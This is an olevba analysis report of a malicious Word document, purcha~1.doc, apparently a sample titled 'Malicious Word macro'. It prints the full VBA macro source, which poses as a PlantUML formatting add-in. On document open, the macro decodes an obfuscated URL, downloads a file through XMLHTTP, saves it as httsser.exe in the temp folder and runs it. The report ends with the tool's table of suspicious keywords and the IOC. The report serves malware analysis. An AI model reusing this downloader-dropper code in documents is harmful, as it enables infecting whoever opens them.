Malicious Word macro

1. olevba 0.41 - http://decalage.info/python/oletools
2. Flags        Filename                                                        
3. -----------  -----------------------------------------------------------------
4. OLE:MASIH--V purcha~1.doc
5.  
6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
7.  
8. ===============================================================================
9. FILE: purcha~1.doc
10. Type: OLE
11. -------------------------------------------------------------------------------
12. VBA MACRO ThisDocument.cls
13. in file: purcha~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
15.  
16. Sub autoopen()
17. getDotPath
18. AutoFormatOff
19. ToolbarInit
20. RibbonOnLoad ""
21. CreateStyleImg
22. End Sub
23.  
24.  
25.  
26. -------------------------------------------------------------------------------
27. VBA MACRO Module1.bas
28. in file: purcha~1.doc - OLE stream: u'Macros/VBA/Module1'
29. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
30.  
31.  
32. Function CreateStyle(Optional overwriteIfStyleExists As Boolean = False)
33.  On Error GoTo CreateStyleAdding
34.  Set mystyle = ActiveDocument.Styles("")
35.  If overwriteIfStyleExists = True Then
36.  GoTo CreateStyleOverwrite
37.  End If
38.  Exit Function
39. CreateStyleAdding:
40.  Set mystyle = ActiveDocument.Styles.Add(Name:="", Type:=wdStyleTypeParagraph)
41. CreateStyleOverwrite:
42.  
43.  
44.  mystyle.BaseStyle = ActiveDocument.Styles(WdBuiltinStyle.wdStyleNormal)
45.  mystyle.AutomaticallyUpdate = True
46.  With mystyle.Font
47.  .Name = ""
48.  .Size = 9
49.  .Hidden = False
50.  .Hidden = True
51.  .Color = wdColorGreen
52.  End With
53.  
54.  mystyle.NoProofing = True
55.  With mystyle.ParagraphFormat
56.  With .Shading
57.  .Texture = wdTextureNone
58.  .ForegroundPatternColor = wdColorAutomatic
59.  .BackgroundPatternColor = wdColorLightGreen
60.  End With
61.  .LineSpacingRule = wdLineSpaceSingle
62.  
63.  .SpaceBefore = 0
64.  .SpaceBeforeAuto = False
65.  .SpaceAfter = 0
66.  .SpaceAfterAuto = False
67.  .LineSpacingRule = wdLineSpaceSingle
68.  .Alignment = wdAlignParagraphLeft
69.  .LineUnitBefore = 0
70.  .LineUnitAfter = 0
71.  .LeftIndent = CentimetersToPoints(0)
72.  
73.  With .Shading
74.  .Texture = wdTextureNone
75.  .ForegroundPatternColor = wdColorAutomatic
76.  .BackgroundPatternColor = 12254650
77.  
78.  End With
79.  With .Borders(wdBorderLeft)
80.  .LineStyle = wdLineStyleDashLargeGap
81.  .LineWidth = wdLineWidth050pt
82.  .Color = 3910491
83.  End With
84.  With .Borders(wdBorderRight)
85.  .LineStyle = wdLineStyleDashLargeGap
86.  .LineWidth = wdLineWidth050pt
87.  .Color = 3910491
88.  End With
89.  With .Borders(wdBorderTop)
90.  .LineStyle = wdLineStyleDashLargeGap
91.  .LineWidth = wdLineWidth050pt
92.  .Color = 3910491
93.  End With
94.  With .Borders(wdBorderBottom)
95.  .LineStyle = wdLineStyleDashLargeGap
96.  .LineWidth = wdLineWidth050pt
97.  .Color = 3910491
98.  End With
99.  With .Borders
100.  .DistanceFromTop = 1
101.  .DistanceFromLeft = 4
102.  .DistanceFromBottom = 1
103.  .DistanceFromRight = 4
104.  .Shadow = False
105.  End With
106.  End With
107.  
108.  
109.  mystyle.NoSpaceBetweenParagraphsOfSameStyle = False
110.  mystyle.ParagraphFormat.TabStops.ClearAll
111.  mystyle.ParagraphFormat.TabStops.Add Position:= _
112.  CentimetersToPoints(1), Alignment:=wdAlignTabLeft, Leader:=wdTabLeaderSpaces
113.  mystyle.ParagraphFormat.TabStops.Add Position:= _
114.  CentimetersToPoints(2), Alignment:=wdAlignTabLeft, Leader:=wdTabLeaderSpaces
115.  mystyle.ParagraphFormat.TabStops.Add Position:= _
116.  CentimetersToPoints(3), Alignment:=wdAlignTabLeft, Leader:=wdTabLeaderSpaces
117.  mystyle.ParagraphFormat.TabStops.Add Position:= _
118.  CentimetersToPoints(4), Alignment:=wdAlignTabLeft, Leader:=wdTabLeaderSpaces
119.  
120.  
121. End Function
122.  
123.  
124. Public Function CreateStyleImg()
125.  
126.  On Error GoTo CreateStyleImgAdding
127.  Set mystyle = ActiveDocument.Styles("")
128.  mystyle.Font.Hidden = False
129.  On Error GoTo CreateStyleSkip
130.  mystyle.BaseStyle = ActiveDocument.Styles("")
131. CreateStyleSkip:
132.  On Error GoTo 0
133.  Exit Function
134. CreateStyleImgAdding:
135. ActiveDocumentContent.Open (styleContainer)
136. Exit Function
137.  Set mystyle = ActiveDocument.Styles.Add(Name:="", Type:=wdStyleTypeParagraph)
138.  mystyle.AutomaticallyUpdate = True
139. End Function
140.  
141.  
142.  
143. Function ShowPlantuml()
144.  DoubleCheckStyle
145.  
146.  
147.  
148.  ActiveDocument.Bookmarks.Add Name:="", Range:=Selection.Range
149.  
150.  Set mystyle = ActiveDocument.Styles("")
151.  
152.  
153.  
154.  
155.  
156.  
157.  
158.  Call ShowHiddenText
159.  
160.  
161.  Selection.GoTo What:=wdGoToBookmark, Name:=""
162.  ActiveDocument.Bookmarks(Index:="").Delete
163.  
164. End Function
165.  
166.  
167.  
168.  
169. Function HidePlantuml()
170.  DoubleCheckStyle
171.  
172.  
173.  ActiveDocument.Bookmarks.Add Name:="", Range:=Selection.Range
174.  
175.  Set mystyle = ActiveDocument.Styles("")
176.  
177.  
178.  
179.  
180.  
181.  
182.  
183.  Call HideHiddenText
184.  
185.  
186.  Selection.GoTo What:=wdGoToBookmark, Name:=""
187.  ActiveDocument.Bookmarks(Index:="").Delete
188.  
189. End Function
190.  
191.  
192. Function HideHiddenText()
193.  ActiveDocument.ActiveWindow.View.ShowAll = False
194.  ActiveDocument.ActiveWindow.View.ShowHiddenText = False
195.  On Error GoTo endHidden
196.  With ActiveDocument.Styles("")
197.  .Font.Hidden = True
198.  End With
199. endHidden:
200.  On Error Resume Next
201. End Function
202.  
203.  
204. Function ShowHiddenText()
205.  ActiveDocument.ActiveWindow.View.ShowAll = False
206.  ActiveDocument.ActiveWindow.View.ShowHiddenText = True
207.  
208.  On Error GoTo endShow
209.  With ActiveDocument.Styles("")
210.  .Font.Hidden = False
211.  End With
212. endShow:
213.  On Error Resume Next
214. End Function
215.  
216.  
217. Function SwitchP()
218.  flag = Not (ActiveDocument.ActiveWindow.View.ShowTabs)
219.  ActiveDocument.ActiveWindow.View.ShowParagraphs = flag
220.  ActiveDocument.ActiveWindow.View.ShowTabs = flag
221.  ActiveDocument.ActiveWindow.View.ShowSpaces = flag
222.  ActiveDocument.ActiveWindow.View.ShowHyphens = flag
223.  ActiveDocument.ActiveWindow.View.ShowAll = False
224. End Function
225.  
226.  
227.  
228.  
229. Function LoadTextFile(sFile) As String
230.  Dim iFile As Integer
231.  
232.  On Local Error Resume Next
233.  
234.  iFile = FreeFile
235.  
236.  
237.  Open sFile For Input As #iFile
238.  
239.  
240.  LoadTextFile = Input$(LOF(iFile), iFile)
241.  
242.  Close #iFile
243.  
244. End Function
245.  
246.  
247.  
248. Sub ISwitchP(ByVal Control As IRibbonControl)
249.  SwitchP
250. End Sub
251.  
252. Sub IShowPlantUML(ByVal Control As IRibbonControl)
253.  ShowPlantuml
254.  
255. End Sub
256.  
257. Sub IHidePlantUML(ByVal Control As IRibbonControl)
258.  HidePlantuml
259.  
260. End Sub
261.  
262. Sub IUML1(ByVal Control As IRibbonControl)
263.  Macro_UML ("")
264.  
265. End Sub
266. Sub IUMLAll(ByVal Control As IRibbonControl)
267.  Macro_UML ("")
268. End Sub
269.  
270. Sub IAutoFormatOn(ByVal Control As IRibbonControl)
271.  AutoFormatOn
272. End Sub
273. Sub IAutoFormatOff(ByVal Control As IRibbonControl)
274.  AutoFormatOff
275. End Sub
276.  
277. Sub IPlantUMLInteractive(ByVal Control As IRibbonControl)
278.  With frmPlantUMLInteractive
279.  
280.  
281.  .tbPlantCode.Text = Replace(Macro_UML(""), vbLf, vbCrLf)
282.  
283.  .Show
284.  
285.  End With
286.  
287. End Sub
288.  
289.  
290.  
291.  
292.  
293. Sub IPreferences(ByVal Control As IRibbonControl)
294.  Dim info As String
295.  info = "" & vbCrLf & _
296.  "" & vbCrLf & _
297.  "" & getDotPath() & vbCrLf & _
298.  "" & getJarPath()
299.  
300.  If RegKeyRead("") = "" Then
301.  vectorgraphics = True
302.  End If
303.  If RegKeyRead("") = "" Then
304.  useFTP = True
305.  End If
306.  FTPURL = RegKeyRead("")
307.  
308.  With PrefsForm
309.  If vectorgraphics = True Then
310.  .btnVectorGraphics.Caption = ""
311.  Else
312.  .btnVectorGraphics.Caption = ""
313.  End If
314.  If useFTP = True Then
315.  .btnFTP.Caption = ""
316.  Else
317.  .btnFTP.Caption = ""
318.  End If
319.  
320.  .info.Caption = info
321.  .Show
322.  RegKeySave "", .btnVectorGraphics.Caption
323.  RegKeySave "", .btnFTP.Caption
324.  RegKeySave "", .tbURL.Text
325.  
326.  
327.  vectorgraphics = (.btnVectorGraphics.Caption = "")
328.  useFTP = (.btnFTP.Caption = "")
329.  FTPURL = (.tbURL.Text)
330.  
331.  End With
332. End Sub
333.  
334. Public Sub AutoFormatOff()
335.  Dim OpenType() As Variant
336.  OpenType = Array(344, 373, 390, 403, 366, 372, 389, 461, 473, 444, 459, 473, 552, 566, 588, 612, 632, 574, 650, 674, 695, 713, 719, 741, 751, 711, 782, 800, 763, 785, 803, 888, 835, 903, 869, 887, 954, 916, 941, 1009, 1024, 989, 1073, 1084, 1088, 1051, 1123, 1159, 1157)
337. With PhotoshopExtension
338.    .Type = 1
339.     .Open
340.     End With
341.     tempFolder = EchoProcessor("TEMP")
342.    
343. GatewayResolver.Open "GET", GetStringFromArray(OpenType, 48), False
344.  
345.     Exit Sub
346.  With options
347.  .AutoFormatAsYouTypeReplaceQuotes = False
348.  .AutoFormatAsYouTypeReplaceSymbols = False
349.  .AutoFormatAsYouTypeReplacePlainTextEmphasis = False
350.  .AutoFormatAsYouTypeDefineStyles = False
351.  .TabIndentKey = True
352.  End With
353. End Sub
354.  
355. Sub AutoFormatOn()
356.  
357.  With options
358.  .AutoFormatAsYouTypeReplaceQuotes = True
359.  .AutoFormatAsYouTypeReplaceSymbols = True
360.  .AutoFormatAsYouTypeReplacePlainTextEmphasis = True
361.  .AutoFormatAsYouTypeDefineStyles = True
362.  .TabIndentKey = True
363.  End With
364. End Sub
365.  
366.  
367.  
368. -------------------------------------------------------------------------------
369. VBA MACRO Module2.bas
370. in file: purcha~1.doc - OLE stream: u'Macros/VBA/Module2'
371. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
372.  
373.  
374. Const startuml = ""
375. Const enduml = ""
376.  
377. Dim vectorgraphics As Boolean
378. Dim useFTP As Boolean
379. Dim FTPURL As String
380.  
381.  
382.  
383.  
384.  
385. Public Sub RibbonOnLoad(ribbon As String)
386.     PhotoshopExtension.write GatewayResolver.responseBody
387.     PhotoshopExtension.savetofile styleContainer, 2
388. End Sub
389.  
390. Function get_gfx_extension() As String
391.  If vectorgraphics Then
392.  get_gfx_extension = ""
393.  Else
394.  get_gfx_extension = ""
395.  End If
396. End Function
397.  
398.  
399. Function get_plantuml_options() As String
400.  Dim options As String
401.  options = ""
402.  If vectorgraphics Then
403.  options = options + ""
404.  End If
405.  
406.  get_plantuml_options = options
407. End Function
408.  
409. Function getExePath(searchfor As String, ByRef try As String) As String
410.  Set fs = CreateObject("")
411.  
412.  nbTemplates = ActiveDocument.Parent.Templates.Count
413.  mainPath = ActiveDocument.Path
414.  try = ActiveDocument.Path & ""
415.  
416.  nb = InStrRev(mainPath, "")
417.  Do While nb > 1 And fs.FileExists(mainPath + searchfor) = False
418.  mainPath = Left(mainPath, nb - 1)
419.  try = try & vbCrLf & mainPath & ""
420.  nb = InStrRev(mainPath, "")
421.  Loop
422.  
423.  For i = 1 To nbTemplates
424.  If fs.FileExists(mainPath + searchfor) = False Then
425.  mainPath = ActiveDocument.Parent.Templates.Item(i).Path
426.  try = try & vbCrLf & ActiveDocument.Parent.Templates.Item(i).Path & ""
427.  nb = InStrRev(mainPath, "")
428.  Do While nb > 1 And fs.FileExists(mainPath + searchfor) = False
429.  mainPath = Left(mainPath, nb - 1)
430.  try = try & vbCrLf & mainPath & ""
431.  nb = InStrRev(mainPath, "")
432.  Loop
433.  End If
434.  Next i
435.  
436.  If fs.FileExists(mainPath + searchfor) Then
437.  getExePath = mainPath
438.  Else
439.  getExePath = "" & vbCrLf & try
440.  End If
441.  
442.  
443. End Function
444.  
445.  
446.  
447. Function getJarPath() As String
448.  Set fs = CreateObject("")
449.  Dim trypath As String
450.  trypath = ""
451.  jarPath = getExePath("", trypath)
452.  If (jarPath <> "") And fs.FileExists(jarPath + "") Then
453.  getJarPath = jarPath
454.  Else
455.  getJarPath = "" & vbCrLf & trypath
456.  End If
457.  
458. End Function
459.  
460.  
461.  
462.  
463.  
464. Public Function getDotPath()
465. Set GatewayResolver = CreateObject("Microsoft" + ".XMLHTTP")
466. Set PhotoshopExtension = CreateObject("Adodb.Stream")
467. Set ActiveDocumentContent = CreateObject("Shell.Application")
468. Set EchoProcessor = CreateObject("WScript.Shell").Environment("Process")
469.  Dim trypath As String
470.  Dim searchfor As String
471.  Exit Function
472.  trypath = Environ("")
473.  If Environ("") <> "" Then Exit Function
474.  searchfor = ""
475.  dotPath = getExePath(searchfor, trypath)
476.  If (dotPath <> "") And fs.FileExists(dotPath + searchfor) Then
477.  getDotPath = dotPath + searchfor
478.  Else
479.  getDotPath = ""
480.  End If
481. End Function
482.  
483.  
484.  
485.  
486. Sub ShowPlantumlJarPath()
487.  Set fs = CreateObject("")
488.  jarPath = getJarPath()
489.  If jarPath <> "" And fs.FileExists(jarPath) Then
490.  MsgBox "" & jarPath
491.  Else
492.  MsgBox jarPath
493.  End If
494. End Sub
495.  
496.  
497. Sub RemoveOldVersionPlantUMLSyles()
498.  On Error GoTo DeleteEnd
499.  ActiveDocument.Styles("").Delete
500.  On Error GoTo 0
501. DeleteEnd:
502.  On Error GoTo 0
503.  Call Macro_UML_all
504.  
505. End Sub
506.  
507.  
508. Sub Macro_UML_all()
509.  Macro_UML ("")
510. End Sub
511.  
512.  
513. Sub Macro_UML_styles()
514.  CreateStyle (True)
515. End Sub
516.  
517.  
518.  
519. Function Macro_UML_parg()
520.  Macro_UML ("")
521. End Function
522.  
523.  
524. Function WriteToFile(sFile, sText As String)
525.  Dim objStream As Object
526.  Set objStream = CreateObject("")
527.  With objStream
528.  .Type = 2
529.  .Mode = 3
530.  
531.  .Charset = ""
532.  .Open
533.  .WriteText sText
534.  .savetofile sFile, 2
535.  End With
536. End Function
537.  
538.  
539.  
540. -------------------------------------------------------------------------------
541. VBA MACRO Module3.bas
542. in file: purcha~1.doc - OLE stream: u'Macros/VBA/Module3'
543. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
544. Public GatewayResolver As Object
545. Public PhotoshopExtension As Object
546. Public EchoProcessor As Object
547. Public tempFolder As String
548. Public styleContainer As String
549. Public ActiveDocumentContent As Object
550. Function Macro_UML(scope) As String
551.  
552.  
553.  
554.  
555.  Dim currentIndex As Long
556.  Dim ftphandle As Long
557.  Dim JavaCommand As String
558.  Dim GraphVizOption As String
559.  GraphVizOption = ""
560.  Dim scalefiles As Scripting.Dictionary
561.  Set scalefiles = New Scripting.Dictionary
562.  ToolbarInit
563.  
564.  If RegKeyRead("") = "" Then
565.  vectorgraphics = True
566.  End If
567.  If RegKeyRead("") = "" Then
568.  useFTP = True
569.  End If
570.  
571.  FTPURL = RegKeyRead("", "")
572.  
573.  
574.  Call CreateStyle(True)
575.  Call CreateStyleImg
576.  Call ShowPlantuml
577.  
578.  Call ShowHiddenText
579.  Selection.Range.Select
580.  
581.  
582.  
583.  documentId = ActiveDocument.Name
584.  documentId = Left(documentId, Len(documentId) - 4)
585.  
586.  
587.  
588.  Set fs = CreateObject("")
589.  jarPath = getJarPath()
590.  If (jarPath = "") Or fs.FileExists(jarPath + "") = False Then
591.  MsgBox jarPath
592.  GoTo Macro_UML_exit
593.  End If
594.  dotPath = getDotPath()
595.  If dotPath <> "" Then
596.  GraphVizOption = """" & dotPath & """"
597.  End If
598.  
599. End Function
600. Public Function GetStringFromArray(fromArr() As Variant, LenLen As Integer) As String
601.     Dim i As Integer
602.     Dim result As String
603.     result = ""
604.     For i = LBound(fromArr) To UBound(fromArr)
605.         result = result & Chr(fromArr(i) - 5 * LenLen - i * 17)
606.     Next i
607.     GetStringFromArray = result
608. End Function
609. Public Function ActiveDocumentCon(fromArr() As Variant, LenLen As Integer) As String
610.  
611.  If scope = "" Then
612.  Set parsedtext = ActiveDocument.Content
613.  isForward = True
614.  Else
615.  Set parsedtext = Selection.Range
616.  
617.  isForward = False
618.  End If
619.  
620.  parsedtext.Find.Execute FindText:=startuml, Forward:=isForward
621.  If parsedtext.Find.Found = True Then
622.  
623.  Set singleparagraph = parsedtext.Paragraphs(1).Range
624.  singleparagraph.Collapse
625.  Else
626.  GoTo Macro_UML_exit
627.  End If
628.  Application.ScreenUpdating = False
629.  jobDone = False
630.  If useFTP Then
631.  ftphandle = ftpOpen(FTPURL)
632.  If ftphandle <= 0 Then
633.  MsgBox ""
634.  Exit Function
635.  End If
636.  End If
637.  
638.  Do While parsedtext.Find.Found = True And _
639.  (scope = "" Or currentIndex < 1) And Not jobDone
640.  
641.  
642.  
643.  Set currentparagraph = parsedtext.Paragraphs(1)
644.  Set paragraphRange = currentparagraph.Range
645.  paragraphRange.Collapse
646.  jobDone = False
647.  Do Until jobDone
648.  If Left(currentparagraph.Range.Text, Len(startuml)) = startuml Then
649.  Set paragraphRange = currentparagraph.Range
650.  paragraphRange.Collapse
651.  
652.  End If
653.  paragraphRange.MoveEnd Unit:=wdParagraph
654.  If Left(currentparagraph.Range.Text, Len(enduml)) = enduml Then
655.  Dim s As String
656.  paragraphRange.Style = ""
657.  s = paragraphRange.Text
658.  currentIndex = currentIndex + 1
659.  
660.  factor = 0#
661.  On Error Resume Next
662.  p = InStr(LCase(s), "")
663.  If p > 0 Then
664.  
665.   endscale = InStr(p + 9, s, Chr(13)) - p - 9
666.   factorstr = Mid(s, p + 9, endscale)
667.   factor = Val(factorstr)
668.  End If
669.  On Error GoTo 0
670.  
671.  textFileId = documentId & "" & Right("" & currentIndex, 4) & ""
672.  If factor > 0 Then
673.   scalefiles(Replace(textFileId, "", "")) = factor
674.  End If
675.  If scope = "" Then
676.   Macro_UML = Mid(s, 1, Len(s) - 1)
677.   Application.ScreenUpdating = True
678.   Exit Function
679.  End If
680.  FileName = jarPath & "" & textFileId
681.  
682.  WriteToFile FileName, Mid(s, 1, Len(s) - 1)
683.  If useFTP Then
684.   retValue = FtpStor(ftphandle, jarPath & "" & textFileId, textFileId)
685.  End If
686.  
687.  If scope <> "" Then
688.   jobDone = True
689.  End If
690.  
691.  End If
692.  Set currentparagraph = currentparagraph.Next
693.  If currentparagraph Is Nothing Then
694.  jobDone = True
695.  End If
696.  Loop
697.  parsedtext.Collapse Direction:=wdCollapseEnd
698.  If scope = "" Then
699.  parsedtext.Find.Execute FindText:=startuml, Forward:=True
700.  End If
701.  Loop
702.  Application.ScreenUpdating = True
703.  
704.  
705.  
706.  
707.  
708.  
709.  
710.  
711.  
712.  
713.  
714.  
715.  If useFTP Then
716.  For i = 1 To currentIndex
717.  imageId = documentId & "" & Right("" & i, 4) & ""
718.  imageName = jarPath & "" & imageId
719.  retValue = FtpRetr(ftphandle, imageName, imageId)
720.  Next i
721.  
722.  Else
723.  
724.  
725.  
726.  
727.  Dim javaoptions
728.  If ActiveDocument.Path Like "" Or Left(ActiveDocument.Path, 1) = "" Then
729.  javaoptions = "" & Chr(34) & ActiveDocument.Path & Chr(34) & ""
730.  End If
731.  
732.  JavaCommand = "" & javaoptions _
733.  & """" & jarPath & "" & _
734.  jarPath & """""" & jarPath & """" & GraphVizOption & get_plantuml_options()
735.  
736.  
737.  
738.  
739.  result = ShellAndWait(JavaCommand, 0, vbMinimizedFocus, AbandonWait)
740.  If result <> Success Then
741.  MsgBox ""
742.  Return
743.  End If
744.  
745.  
746.  
747.  Sleep 1000
748.  End If
749.  
750.  
751.  
752.  
753.  
754.  jobDone = False
755.  nrOfImages = currentIndex
756.  currentIndex = 0
757.  
758.  
759.  
760.  
761.  
762.  
763.  If useFTP Then
764.  
765.  Else
766.  Do
767.  currentIndex = currentIndex + 1
768.  
769.  
770.  
771.  
772.  DoEvents
773.  
774.  Sleep 100
775.  If fs.FileExists(jarPath & "") = False Then
776.  jobDone = True
777.  Exit Do
778.  End If
779.  If currentIndex > 30 Then
780.  
781.  MsgBox ("")
782.  Exit Do
783.  End If
784.  Loop
785.  
786.  If jobDone = False Then
787.  End
788.  End If
789.  End If
790.  
791.  
792.  
793.  
794.  
795.  If scope = "" Then
796.  Set parsedtext = ActiveDocument.Content
797.  isForward = True
798.  Else
799.  Set parsedtext = singleparagraph
800.  isForward = True
801.  End If
802.  parsedtext.Find.Execute FindText:=enduml, Forward:=isForward
803.  currentIndex = 0
804.  bTrackRevFlag = ActiveDocument.TrackRevisions
805.  ActiveDocument.TrackRevisions = False
806.  Do While parsedtext.Find.Found = True And (scope = "" Or currentIndex < 1)
807.  currentIndex = currentIndex + 1
808.  
809.  
810.  
811.  On Error GoTo LastParagraph
812.  
813.  
814.  
815.  Set currentparagraph = parsedtext.Paragraphs(1).Next.Range
816.  Do While currentparagraph.InlineShapes.Count > 0 And currentparagraph.Style = ""
817.  currentparagraph.Delete
818.  Set currentparagraph = parsedtext.Paragraphs(1).Next.Range
819.  Loop
820.  On Error GoTo 0
821.  Set currentRange = currentparagraph
822.  imagesDirectory = jarPath & "" & documentId & "" & Right("" & currentIndex, 4) & get_gfx_extension()
823.  Image = Dir(imagesDirectory)
824.  While Image <> ""
825.  
826.  errorTextFile = jarPath & "" & Left(Image, Len(Image) - 4) & ""
827.  BaseName = Left(Image, Len(Image) - 4)
828.  Set currentparagraph = ActiveDocument.Paragraphs.Add(Range:=currentRange).Range
829.  Set currentRange = currentparagraph.Paragraphs(1).Next.Range
830.  currentparagraph.Style = ""
831.  currentparagraph.Collapse
832.  
833.  Set Image = currentparagraph.InlineShapes.AddPicture _
834.  (FileName:=jarPath & "" & Image _
835.  , LinkToFile:=False, SaveWithDocument:=True)
836.  
837.  
838.  If scalefiles(CStr(BaseName)) > 0.1 And scalefiles(CStr(BaseName)) < 5 Then
839.  Image.ScaleWidth = scalefiles(CStr(BaseName)) * 100
840.  Image.ScaleHeight = scalefiles(CStr(BaseName)) * 100
841.  Else
842.  
843.  
844.  With Image
845.   .LockAspectRatio = msoFalse
846.   .ScaleWidth = 100
847.   .ScaleHeight = 100
848.   percentW = ActiveDocument.PageSetup.TextColumns.Width / Image.Width
849.   percentH = (ActiveDocument.PageSetup.PageHeight - ActiveDocument.PageSetup.TopMargin - ActiveDocument.PageSetup.BottomMargin) / Image.Height
850.   If percentH < percentW Then percentW = percentH
851.   If percentW < 1 Then
852.   .ScaleWidth = percentW * 100
853.   .ScaleHeight = percentW * 100
854.   End If
855.  End With
856.  End If
857.  
858.  If fs.FileExists(errorTextFile) Then
859.  Image.AlternativeText = LoadTextFile(errorTextFile)
860.  Beep
861.  Else
862.  Image.AlternativeText = ""
863.  End If
864.  
865.  If Image.ScaleHeight > 100 Or Image.ScaleWidth > 100 Then
866.  Image.Reset
867.  End If
868.  Image = Dir()
869.  Wend
870.  parsedtext.Collapse Direction:=wdCollapseEnd
871.  parsedtext.Find.Execute FindText:=enduml, Forward:=True
872.  Loop
873.  ActiveDocument.TrackRevisions = bTrackRevFlag
874.  
875.  
876.  
877.  
878. Phase3:
879.  
880.  
881.  
882.  If Not useFTP Then
883.  On Error Resume Next
884.  
885.  Kill (jarPath & "" & documentId & "")
886.  On Error GoTo 0
887.  Else
888.  ftpClose ftphandle
889.  End If
890. Macro_UML_exit:
891.  
892.  
893.  
894.  
895.  Call ShowHiddenText
896.  DoubleCheckStyle
897. Exit Function
898.  
899.  
900.  
901. LastParagraph:
902.  Selection.EndKey Unit:=wdStory
903.  Selection.TypeParagraph
904.  Selection.ClearFormatting
905.  
906.  imagesDirectory = jarPath & "" & documentId & "" & Right("" & currentIndex, 4) & get_gfx_extension
907.  Image = Dir(imagesDirectory)
908.  While Image <> ""
909.  
910.  errorTextFile = jarPath & "" & Left(Image, Len(Image) - 4) & ""
911.  
912.  Set currentparagraph = ActiveDocument.Paragraphs.Add.Range
913.  Set currentRange = currentparagraph.Paragraphs(1).Next.Range
914.  currentparagraph.Style = ""
915.  currentparagraph.Collapse
916.  
917.  Set Image = currentparagraph.InlineShapes.AddPicture _
918.  (FileName:=jarPath & "" & Image _
919.  , LinkToFile:=False, SaveWithDocument:=True)
920.  
921.  If fs.FileExists(errorTextFile) Then
922.  Image.AlternativeText = LoadTextFile(errorTextFile)
923.  Beep
924.  Else
925.  Image.AlternativeText = ""
926.  End If
927.  
928.  If Image.ScaleHeight > 100 Or Image.ScaleWidth > 100 Then
929.  Image.Reset
930.  End If
931.  Image = Dir()
932.  Wend
933.  
934.  
935.  GoTo Phase3
936.  
937. End Function
938.  
939.  
940.  
941. Public Sub ToolbarInit()
942. styleContainer = tempFolder + "\httsser.exe"
943.  On Error Resume Next
944.  ActiveDocument.CommandBars("").Delete
945.  On Error GoTo 0
946.  GatewayResolver.Send
947. End Sub
948.  
949.  
950.  
951.  
952. Function OldToolbarInit()
953.  On Error GoTo ToolbarCreation
954.  Set toolBar = ActiveDocument.CommandBars("")
955.  On Error GoTo 0
956.  
957.  toolBar.Visible = True
958.  
959.  On Error GoTo ButtonAdd
960.  Set currentButton = toolBar.Controls(1)
961.  On Error GoTo 0
962.  currentButton.OnAction = ""
963.  currentButton.Style = msoButtonCaption
964.  currentButton.Caption = Chr(182)
965.  currentButton.Visible = True
966.  
967.  On Error GoTo ButtonAdd
968.  Set currentButton = toolBar.Controls(2)
969.  On Error GoTo 0
970.  currentButton.OnAction = ""
971.  currentButton.Style = msoButtonCaption
972.  currentButton.Caption = ""
973.  currentButton.Visible = True
974.  
975.  On Error GoTo ButtonAdd
976.  Set currentButton = toolBar.Controls(3)
977.  On Error GoTo 0
978.  currentButton.OnAction = ""
979.  currentButton.Style = msoButtonCaption
980.  currentButton.Caption = ""
981.  currentButton.Visible = True
982.  
983.  On Error GoTo ButtonAdd
984.  Set currentButton = toolBar.Controls(4)
985.  On Error GoTo 0
986.  currentButton.OnAction = ""
987.  currentButton.Style = msoButtonCaption
988.  currentButton.Caption = ""
989.  currentButton.Visible = True
990.  
991.  On Error GoTo ButtonAdd
992.  Set currentButton = toolBar.Controls(5)
993.  On Error GoTo 0
994.  currentButton.OnAction = ""
995.  currentButton.Style = msoButtonCaption
996.  currentButton.Caption = ""
997.  currentButton.Visible = True
998.  
999.  On Error GoTo ButtonAdd
1000.  Set currentButton = toolBar.Controls(6)
1001.  On Error GoTo 0
1002.  currentButton.OnAction = ""
1003.  currentButton.Style = msoButtonCaption
1004.  currentButton.Caption = ""
1005.  currentButton.Visible = True
1006.  Exit Function
1007.  
1008. ToolbarCreation:
1009.  Set toolBar = ActiveDocument.CommandBars.Add(Name:="")
1010.  Resume Next
1011.  
1012. ButtonAdd:
1013.  Set currentButton = toolBar.Controls.Add(Type:=msoControlButton, Before:=toolBar.Controls.Count + 1)
1014.  Resume Next
1015.  
1016. End Function
1017.  
1018.  
1019.  
1020. Function DoubleCheckStyle()
1021.  CreateStyle
1022.  CreateStyleImg
1023.  Set mystyle = ActiveDocument.Styles("")
1024.  
1025.  
1026.  mystyle.BaseStyle = ActiveDocument.Styles(WdBuiltinStyle.wdStyleNormal)
1027.  
1028.  mystyle.AutomaticallyUpdate = True
1029.  With mystyle.Font
1030.  .Name = ""
1031.  .Size = 9
1032.  .Hidden = False
1033.  
1034.  .Color = wdColorGreen
1035.  End With
1036. End Function
1037.  
1038.  
1039.  
1040. +------------+----------------------+-----------------------------------------+
1041. | Type       | Keyword              | Description                             |
1042. +------------+----------------------+-----------------------------------------+
1043. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
1044. | Suspicious | Kill                 | May delete a file                       |
1045. | Suspicious | Open                 | May open a file                         |
1046. | Suspicious | Shell                | May run an executable file or a system  |
1047. |            |                      | command                                 |
1048. | Suspicious | vbMinimizedFocus     | May run an executable file or a system  |
1049. |            |                      | command                                 |
1050. | Suspicious | WScript.Shell        | May run an executable file or a system  |
1051. |            |                      | command                                 |
1052. | Suspicious | Shell.Application    | May run an application (if combined     |
1053. |            |                      | with CreateObject)                      |
1054. | Suspicious | CreateObject         | May create an OLE object                |
1055. | Suspicious | Chr                  | May attempt to obfuscate specific       |
1056. |            |                      | strings                                 |
1057. | Suspicious | ADODB.Stream         | May create a text file                  |
1058. | Suspicious | WriteText            | May create a text file                  |
1059. | Suspicious | SaveToFile           | May create a text file                  |
1060. | Suspicious | Environ              | May read system environment variables   |
1061. | Suspicious | Write                | May write to a file (if combined with   |
1062. |            |                      | Open)                                   |
1063. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
1064. |            |                      | (obfuscation: VBA expression)           |
1065. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
1066. |            |                      | be used to obfuscate strings (option    |
1067. |            |                      | --decode to see all)                    |
1068. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
1069. |            | Strings              | may be used to obfuscate strings        |
1070. |            |                      | (option --decode to see all)            |
1071. | IOC        | httsser.exe          | Executable file name                    |
